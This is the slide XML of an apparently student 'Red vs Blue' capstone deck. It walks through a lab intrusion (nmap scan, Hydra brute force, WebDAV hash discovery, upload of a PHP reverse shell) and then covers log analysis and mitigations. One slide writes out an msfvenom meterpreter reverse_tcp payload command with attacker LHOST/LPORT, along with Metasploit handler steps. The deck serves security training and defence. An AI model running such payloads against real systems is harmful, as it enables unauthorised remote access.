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7" roundtripDataSignature="AMtx7mhHcmSvnYWkxUfpZOm1AVG+BdoT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B588B7D-66C1-4E79-A3BD-E98AFE8B7BB2}">
  <a:tblStyle styleId="{3B588B7D-66C1-4E79-A3BD-E98AFE8B7BB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1" name="Google Shape;10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5" name="Google Shape;11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6" name="Google Shape;11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3" name="Google Shape;11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4" name="Google Shape;117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5" name="Google Shape;11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6" name="Google Shape;119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3" name="Google Shape;120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1" name="Google Shape;121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9" name="Google Shape;12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8" name="Google Shape;10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7" name="Google Shape;122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5" name="Google Shape;123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5" name="Google Shape;10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1" name="Google Shape;10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9" name="Google Shape;10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5" name="Google Shape;10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3" name="Google Shape;10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5" name="Google Shape;11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3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2" name="Google Shape;92;p33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3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4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3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1" name="Google Shape;101;p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2" name="Google Shape;10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5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3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3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3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8" name="Google Shape;11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3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2" name="Google Shape;12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3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7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3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3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4" name="Google Shape;13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8" name="Google Shape;138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3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0" name="Google Shape;140;p3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3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2" name="Google Shape;14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3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4" name="Google Shape;14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9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9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3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3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3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3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0" name="Google Shape;160;p40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3" name="Google Shape;16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4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4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0" name="Google Shape;17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4" name="Google Shape;174;p4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75" name="Google Shape;175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" name="Google Shape;176;p4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4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78" name="Google Shape;178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" name="Google Shape;179;p4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" name="Google Shape;180;p4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1" name="Google Shape;181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4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" name="Google Shape;183;p4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4" name="Google Shape;184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4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4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4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7" name="Google Shape;197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1" name="Google Shape;201;p4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2" name="Google Shape;202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" name="Google Shape;204;p4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05" name="Google Shape;205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" name="Google Shape;206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" name="Google Shape;207;p4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08" name="Google Shape;208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p4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1" name="Google Shape;211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4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4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4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4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0" name="Google Shape;220;p4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1" name="Google Shape;221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p4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5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29" name="Google Shape;229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" name="Google Shape;231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" name="Google Shape;232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3" name="Google Shape;233;p4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4" name="Google Shape;234;p4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4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4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4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" name="Google Shape;238;p4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39" name="Google Shape;239;p4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4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4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" name="Google Shape;242;p4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3" name="Google Shape;243;p4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4" name="Google Shape;244;p4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4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4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47" name="Google Shape;247;p4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8" name="Google Shape;248;p4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" name="Google Shape;249;p4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" name="Google Shape;250;p4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1" name="Google Shape;251;p4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4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4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Google Shape;254;p4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55" name="Google Shape;255;p4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4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" name="Google Shape;257;p4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p4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4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4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66" name="Google Shape;266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7" name="Google Shape;267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" name="Google Shape;268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" name="Google Shape;269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0" name="Google Shape;270;p4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1" name="Google Shape;271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44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4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" name="Google Shape;275;p4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76" name="Google Shape;276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4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0" name="Google Shape;280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1" name="Google Shape;281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p4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4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4" name="Google Shape;284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5" name="Google Shape;285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" name="Google Shape;286;p4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" name="Google Shape;287;p4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88" name="Google Shape;288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4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" name="Google Shape;291;p4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2" name="Google Shape;292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3" name="Google Shape;293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p44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4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4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4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4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3" name="Google Shape;303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4" name="Google Shape;304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5" name="Google Shape;305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07" name="Google Shape;307;p4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08" name="Google Shape;308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9" name="Google Shape;309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" name="Google Shape;310;p45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Google Shape;311;p4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4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3" name="Google Shape;313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45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4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18" name="Google Shape;318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45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4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4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3" name="Google Shape;323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5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4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28" name="Google Shape;328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45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4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4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3" name="Google Shape;333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45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4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4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38" name="Google Shape;338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45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3" name="Google Shape;343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4" name="Google Shape;344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6" name="Google Shape;346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7" name="Google Shape;347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4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4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0" name="Google Shape;350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4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4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4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55" name="Google Shape;355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4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4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0" name="Google Shape;360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4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65" name="Google Shape;365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4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4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4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0" name="Google Shape;370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46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4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4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75" name="Google Shape;375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46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4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4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0" name="Google Shape;380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46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4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4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85" name="Google Shape;385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46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Google Shape;390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1" name="Google Shape;391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2" name="Google Shape;392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3" name="Google Shape;393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4" name="Google Shape;394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4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p4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97" name="Google Shape;397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4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4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4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2" name="Google Shape;402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4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4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4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07" name="Google Shape;407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4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4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4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2" name="Google Shape;412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4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4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4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17" name="Google Shape;417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47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4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4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2" name="Google Shape;422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47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4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4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27" name="Google Shape;427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47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4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4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2" name="Google Shape;432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7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38" name="Google Shape;438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9" name="Google Shape;439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0" name="Google Shape;440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1" name="Google Shape;441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2" name="Google Shape;442;p4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3" name="Google Shape;443;p4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4" name="Google Shape;444;p4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p4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8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7" name="Google Shape;447;p48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4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4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48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8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2" name="Google Shape;452;p4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3" name="Google Shape;453;p4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4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4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0" name="Google Shape;460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1" name="Google Shape;46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3" name="Google Shape;463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4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4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4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4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4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4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0" name="Google Shape;480;p4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1" name="Google Shape;481;p4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2" name="Google Shape;482;p4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3" name="Google Shape;483;p4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88" name="Google Shape;488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9" name="Google Shape;489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1" name="Google Shape;491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5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5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5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5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5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99" name="Google Shape;49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0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0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6" name="Google Shape;506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07" name="Google Shape;507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8" name="Google Shape;508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0" name="Google Shape;510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5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5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5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5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5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5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5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18" name="Google Shape;518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5" name="Google Shape;525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26" name="Google Shape;526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7" name="Google Shape;527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9" name="Google Shape;529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5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5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5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5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5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5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37" name="Google Shape;537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2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Google Shape;544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45" name="Google Shape;545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6" name="Google Shape;546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8" name="Google Shape;548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5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0" name="Google Shape;550;p5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5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5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5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56" name="Google Shape;556;p53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3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3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3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3" name="Google Shape;56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4" name="Google Shape;56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5" name="Google Shape;565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7" name="Google Shape;567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5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9" name="Google Shape;569;p5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5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5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5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5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77" name="Google Shape;577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4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4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86" name="Google Shape;586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7" name="Google Shape;587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9" name="Google Shape;589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5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1" name="Google Shape;591;p5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5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5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5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5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99" name="Google Shape;599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7" name="Google Shape;607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08" name="Google Shape;608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9" name="Google Shape;609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1" name="Google Shape;611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5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3" name="Google Shape;613;p5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5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5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5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5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p5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1" name="Google Shape;621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9" name="Google Shape;629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0" name="Google Shape;630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1" name="Google Shape;631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3" name="Google Shape;633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5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5" name="Google Shape;635;p5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5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5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5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Google Shape;639;p5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5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1" name="Google Shape;641;p5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3" name="Google Shape;643;p57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7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7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7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7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1" name="Google Shape;651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2" name="Google Shape;652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3" name="Google Shape;653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5" name="Google Shape;655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5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7" name="Google Shape;657;p5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5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5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5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5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5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3" name="Google Shape;663;p5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4" name="Google Shape;664;p5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5" name="Google Shape;665;p5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6" name="Google Shape;666;p5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67" name="Google Shape;667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8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8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8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6" name="Google Shape;67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77" name="Google Shape;67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8" name="Google Shape;678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0" name="Google Shape;680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5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2" name="Google Shape;682;p5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5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5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5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5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5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8" name="Google Shape;688;p5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9" name="Google Shape;689;p5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0" name="Google Shape;690;p5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1" name="Google Shape;691;p5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2" name="Google Shape;69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1" name="Google Shape;701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2" name="Google Shape;702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3" name="Google Shape;703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5" name="Google Shape;705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6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7" name="Google Shape;707;p6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6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6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6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6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6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Google Shape;713;p6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6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5" name="Google Shape;715;p6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6" name="Google Shape;716;p6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17" name="Google Shape;717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6" name="Google Shape;726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27" name="Google Shape;72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8" name="Google Shape;728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0" name="Google Shape;73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6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2" name="Google Shape;732;p6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6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6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6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6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6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8" name="Google Shape;738;p6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9" name="Google Shape;739;p6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0" name="Google Shape;740;p6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1" name="Google Shape;741;p6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2" name="Google Shape;742;p6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6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6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6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2" name="Google Shape;752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3" name="Google Shape;753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5" name="Google Shape;75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6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6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6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9" name="Google Shape;759;p6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6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6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6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3" name="Google Shape;763;p6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6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5" name="Google Shape;765;p6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6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7" name="Google Shape;767;p6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6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69" name="Google Shape;769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2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62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62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1389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7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9" name="Google Shape;779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0" name="Google Shape;780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1" name="Google Shape;781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3" name="Google Shape;783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6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5" name="Google Shape;785;p6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6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7" name="Google Shape;787;p6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6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6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6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1" name="Google Shape;791;p6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6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3" name="Google Shape;793;p6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6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5" name="Google Shape;795;p6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6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97" name="Google Shape;797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7" name="Google Shape;807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08" name="Google Shape;808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9" name="Google Shape;809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1" name="Google Shape;811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6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3" name="Google Shape;813;p6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6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5" name="Google Shape;815;p6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6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6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6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9" name="Google Shape;819;p6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6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1" name="Google Shape;821;p6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6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6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6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5" name="Google Shape;825;p6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6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6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6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6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4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4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5" name="Google Shape;835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36" name="Google Shape;836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7" name="Google Shape;837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9" name="Google Shape;839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6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1" name="Google Shape;841;p6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6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6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6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6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6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7" name="Google Shape;847;p6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6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9" name="Google Shape;849;p6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6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1" name="Google Shape;851;p6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6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3" name="Google Shape;853;p65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65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65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65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65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65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5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2" name="Google Shape;862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3" name="Google Shape;863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4" name="Google Shape;864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6" name="Google Shape;866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6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6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9" name="Google Shape;869;p6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6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1" name="Google Shape;871;p6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6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3" name="Google Shape;873;p6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6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5" name="Google Shape;875;p6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6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6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6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9" name="Google Shape;879;p6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6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1" name="Google Shape;881;p6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6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3" name="Google Shape;883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66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66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6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6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3" name="Google Shape;893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4" name="Google Shape;894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5" name="Google Shape;895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7" name="Google Shape;897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6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6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0" name="Google Shape;900;p6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6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2" name="Google Shape;902;p6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6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4" name="Google Shape;904;p6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6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6" name="Google Shape;906;p6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6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8" name="Google Shape;908;p6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6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0" name="Google Shape;910;p6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6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2" name="Google Shape;912;p6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6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4" name="Google Shape;914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25" name="Google Shape;925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6" name="Google Shape;926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8" name="Google Shape;928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6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6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6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3" name="Google Shape;933;p6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6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6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6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9" name="Google Shape;939;p6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6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6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6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6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5" name="Google Shape;945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56" name="Google Shape;956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7" name="Google Shape;957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9" name="Google Shape;959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6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6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6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6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4" name="Google Shape;964;p6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6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6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6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6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6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6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6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2" name="Google Shape;972;p6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6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6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6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6" name="Google Shape;976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70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7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9" name="Google Shape;98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7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7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7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6" name="Google Shape;996;p7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2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28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28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8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28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7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7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1" name="Google Shape;51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4" name="Google Shape;5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5" name="Google Shape;55;p2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2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2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" name="Google Shape;5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1" name="Google Shape;61;p3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3" name="Google Shape;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4" name="Google Shape;64;p3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3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3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" name="Google Shape;6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1" name="Google Shape;71;p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3" name="Google Shape;7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4" name="Google Shape;74;p3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3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3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" name="Google Shape;7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1" name="Google Shape;81;p3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83" name="Google Shape;8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" name="Google Shape;85;p3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3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3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3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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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4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5.jpg"/><Relationship Id="rId5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6.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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9.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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capec.mitre.org/index.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/index.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/index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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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4" name="Google Shape;1014;p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15" name="Google Shape;1015;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7593450" y="4436750"/>
            <a:ext cx="12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Jason Gibson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Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1128" name="Google Shape;1128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29" name="Google Shape;1129;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="14543" y="1212076"/>
            <a:ext cx="3365118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10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14543" y="1212125"/>
            <a:ext cx="3496050" cy="2774973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Used Msfvenom to create a reverse shell, it was then uploaded to the target machine.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Msfvenom –p php/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 –f &gt; otherone.php</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="105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Metasploit was used to set up to listen for when the connection was made back to the attacking machine.  Msfconsole, use exploit/mulit/handler/, set payload php/meterpreter/reverse_tcp, set LHOST to 192.168.1.8,  run.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1" name="Google Shape;1131;p10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="678596"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1132" name="Google Shape;1132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3" name="Google Shape;1133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4" name="Google Shape;1134;p10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3706964" y="688966"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1135" name="Google Shape;1135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6" name="Google Shape;1136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7" name="Google Shape;1137;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3510593" y="1212076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10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3510593" y="1212126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Was able to create and upload the php payload.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Once it ran, it created a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reverse</a:t>
            </a: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tcp connection from the target machine to the attacking machine. Msfconsole was listening for the connection and gave the attacking machine access and found the hidden flag.txt.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9" name="Google Shape;1139;p10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5924550" y="679752"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1140" name="Google Shape;1140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1" name="Google Shape;1141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42" name="Google Shape;1142;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16174" l="38790" r="24409" t="19422"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5805725" y="1212076"/>
            <a:ext cx="3365118" cy="331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10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="15569" l="38020" r="7412" t="72506"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685114" y="4260013"/>
            <a:ext cx="4989679" cy="613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11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0" name="Google Shape;1150;p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56" name="Google Shape;1156;p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57" name="Google Shape;1157;p12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Google Shape;1158;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="647400"/>
            <a:ext cx="9144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Time the port scan occurred:Oct 27, 2021 @ 23:02:00.000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123.658 packets sent from the IP 192.168.1.8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Most of the requests are for different port numbers</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1159" name="Google Shape;11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25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12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="18871" l="0" r="0" t="9856"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1467826"/>
            <a:ext cx="9168600" cy="367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6" name="Google Shape;1166;p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67" name="Google Shape;1167;p13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8" name="Google Shape;1168;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="636525"/>
            <a:ext cx="9144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18,809 request were made starting on Oct 27, 2021 @ 23:19:02.974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file “connect_to_corp_server” was found in the “secret_folder” and contained password hash and instructions.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1169" name="Google Shape;116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50" y="73036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13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="19204" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="85950" y="1139350"/>
            <a:ext cx="8994727" cy="37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7175" y="3668900"/>
            <a:ext cx="5210743" cy="9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7" name="Google Shape;1177;p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78" name="Google Shape;1178;p14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9" name="Google Shape;1179;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275550" y="704300"/>
            <a:ext cx="87294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18,645 request were made in the Hydra brute force attack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18,644 request with “error 401 unauthorized”, the first success was on Oct 27, 2021 @ 23:23:25.239</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1180" name="Google Shape;11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550" y="872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14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5529" l="0" r="1028" t="21514"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="47275" y="1391275"/>
            <a:ext cx="8729376" cy="361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3499" y="2456199"/>
            <a:ext cx="5562822" cy="1719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8" name="Google Shape;1188;p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89" name="Google Shape;1189;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="711700"/>
            <a:ext cx="84093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22 requests were made to this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>directory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file found was ‘passwd.dav’ which included another hashed password for ryan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Also under the /webdav directory was a newly created .php file</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1190" name="Google Shape;119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350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700" y="1576700"/>
            <a:ext cx="7467937" cy="77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15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="43235" l="20134" r="0" t="42807"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3878475"/>
            <a:ext cx="9239102" cy="90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75457" y="2616568"/>
            <a:ext cx="5329876" cy="992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Google Shape;11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16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0" name="Google Shape;1200;p1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6" name="Google Shape;1206;p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07" name="Google Shape;1207;p17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filter that will detect traffic from a single IP connecting to multiple ports.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Any IP trying to access closed ports would trigger the filter.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p1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Install a firewall, they can detect the port scans and stop them.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Filter traffic from an IP that alerts the firewall can mitigate port scans.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4" name="Google Shape;1214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15" name="Google Shape;1215;p1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alarm can be set for any IP not on the whitelist when an attempt to access is made.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threshold would be more than one attempt to access it.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p1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Have a whitelist of IP address that can access that location.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Rename to something not so tempting as well as use some sort of encryption.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Remove the directory listing.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2" name="Google Shape;1222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23" name="Google Shape;1223;p19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alert can be made if ‘401 Unauthorized’  is identified within a set timeframe.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Start with 3 attempts within 1 minute.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1224" name="Google Shape;1224;p1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Lock the account after certain amount of attempts.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Limit logins to whitelisted IP addresses.</a:t>
            </a:r>
            <a:endParaRPr sz="14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Configure account policies on the server to limit failed login attempts.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Enforce complex passwords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1" name="Google Shape;1021;p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2" name="Google Shape;1022;p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23" name="Google Shape;1023;p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4" name="Google Shape;1024;p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5" name="Google Shape;102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6" name="Google Shape;102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7" name="Google Shape;1027;p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28" name="Google Shape;102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9" name="Google Shape;102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0" name="Google Shape;1030;p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1" name="Google Shape;1031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2" name="Google Shape;1032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3" name="Google Shape;1033;p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4" name="Google Shape;1034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5" name="Google Shape;1035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6" name="Google Shape;1036;p2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7" name="Google Shape;1037;p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2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2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0" name="Google Shape;1230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31" name="Google Shape;1231;p2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alert for any non whitelisted IP address attempting access.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threshold would be 1, any attempt to access.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="Google Shape;1232;p2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Connections to the folder should not be accessible from the web and can be configured via firewall.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firewall should be installed to restrict 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8" name="Google Shape;1238;p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39" name="Google Shape;1239;p2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alarm for any .php file that is uploaded.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threshold will be one to catch all uploads from a unknown IP address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40" name="Google Shape;1240;p2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Remove the ability to upload files over the web.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firewall should have strict settings to block the attempts.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246" name="Google Shape;1246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47" name="Google Shape;1247;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1183050"/>
            <a:ext cx="7281828" cy="16927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http://capec.mitre.org/index.html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https://cwe.mitre.org/index.html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https://cve.mitre.org/index.html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48" name="Google Shape;1048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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6857100" y="906438"/>
            <a:ext cx="2286900" cy="37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Range:192.168.1.0/24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OS:Windows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Hostname:Red vs Blue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OS:Kali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Hostname:Kali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OS:Ubuntu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Hostname:Capstone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OS:Ubuntu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Hostname:ELK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54" name="Google Shape;1054;p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5" name="Google Shape;1055;p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056" name="Google Shape;10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341" y="713913"/>
            <a:ext cx="6173785" cy="417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5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4" name="Google Shape;1064;p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0" name="Google Shape;1070;p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1" name="Google Shape;1071;p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72" name="Google Shape;1072;p6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{3B588B7D-66C1-4E79-A3BD-E98AFE8B7BB2}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 vs Blue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Virtual Host Machine, we will view log data from Kibana on here.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Logs activity from Capstone machine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78" name="Google Shape;1078;p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79" name="Google Shape;1079;p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80" name="Google Shape;1080;p7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="12018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{3B588B7D-66C1-4E79-A3BD-E98AFE8B7BB2}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
                <a:gridCol w="2787500"/>
              </a:tblGrid>
              <a:tr h="425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86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Scanning</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i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adversary uses a combination of techniques to determine the state of the ports on a remote target.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the attacker to find open ports and the systems running on them.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6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Usernames and Passwords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software does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame, making it more susceptible to brute force attacks.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the attacker to run dictionary based attacks to obtain credentials.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reverse shell is a remote shell, where the connection is made from the system that offers the services to the client that wants to use these services.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the attacker to have the victim create the connection back to the attacker to have access to the system.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Exploitation: Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1086" name="Google Shape;1086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87" name="Google Shape;1087;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="159308" y="1508128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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247650" y="1480575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Netstat was used to determine what was on the network.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netstat 192.168.1.0/16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Nmap was used to find open ports and identify the target machine.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nmap 192.168.1.105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Firefox was used to navigate to http://192.168.1.105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9" name="Google Shape;1089;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="159308" y="876814"/>
            <a:ext cx="533372" cy="544569"/>
            <a:chOff x="453491" y="1364357"/>
            <a:chExt cx="695400" cy="709906"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1090" name="Google Shape;1090;p8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="453491" y="1364357"/>
              <a:ext cx="695400" cy="621301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1" name="Google Shape;1091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2" name="Google Shape;1092;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2587808" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1093" name="Google Shape;1093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4" name="Google Shape;1094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5" name="Google Shape;1095;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="260868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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2737553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Netstat was used to find the active devices on the network.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Nmap revealed the open ports and what services run on them.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Navigating Firefox showed evidence of a ‘secret_folder’.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1097" name="Google Shape;1097;p8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5016308" y="871308"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1098" name="Google Shape;1098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00" name="Google Shape;1100;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="57607" l="31429" r="29996" t="24821"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5569850" y="815575"/>
            <a:ext cx="3527347" cy="903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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="14236" l="28644" r="39450" t="66813"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5577526" y="1818254"/>
            <a:ext cx="3511994" cy="117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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="52091" l="35429" r="28643" t="17047"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5549680" y="3047390"/>
            <a:ext cx="3285270" cy="1587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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="0"/>
            <a:ext cx="91686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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: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Weak Usernames and Passwords</a:t>
            </a:r>
            <a:endParaRPr b="1"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8" name="Google Shape;1108;p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09" name="Google Shape;1109;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
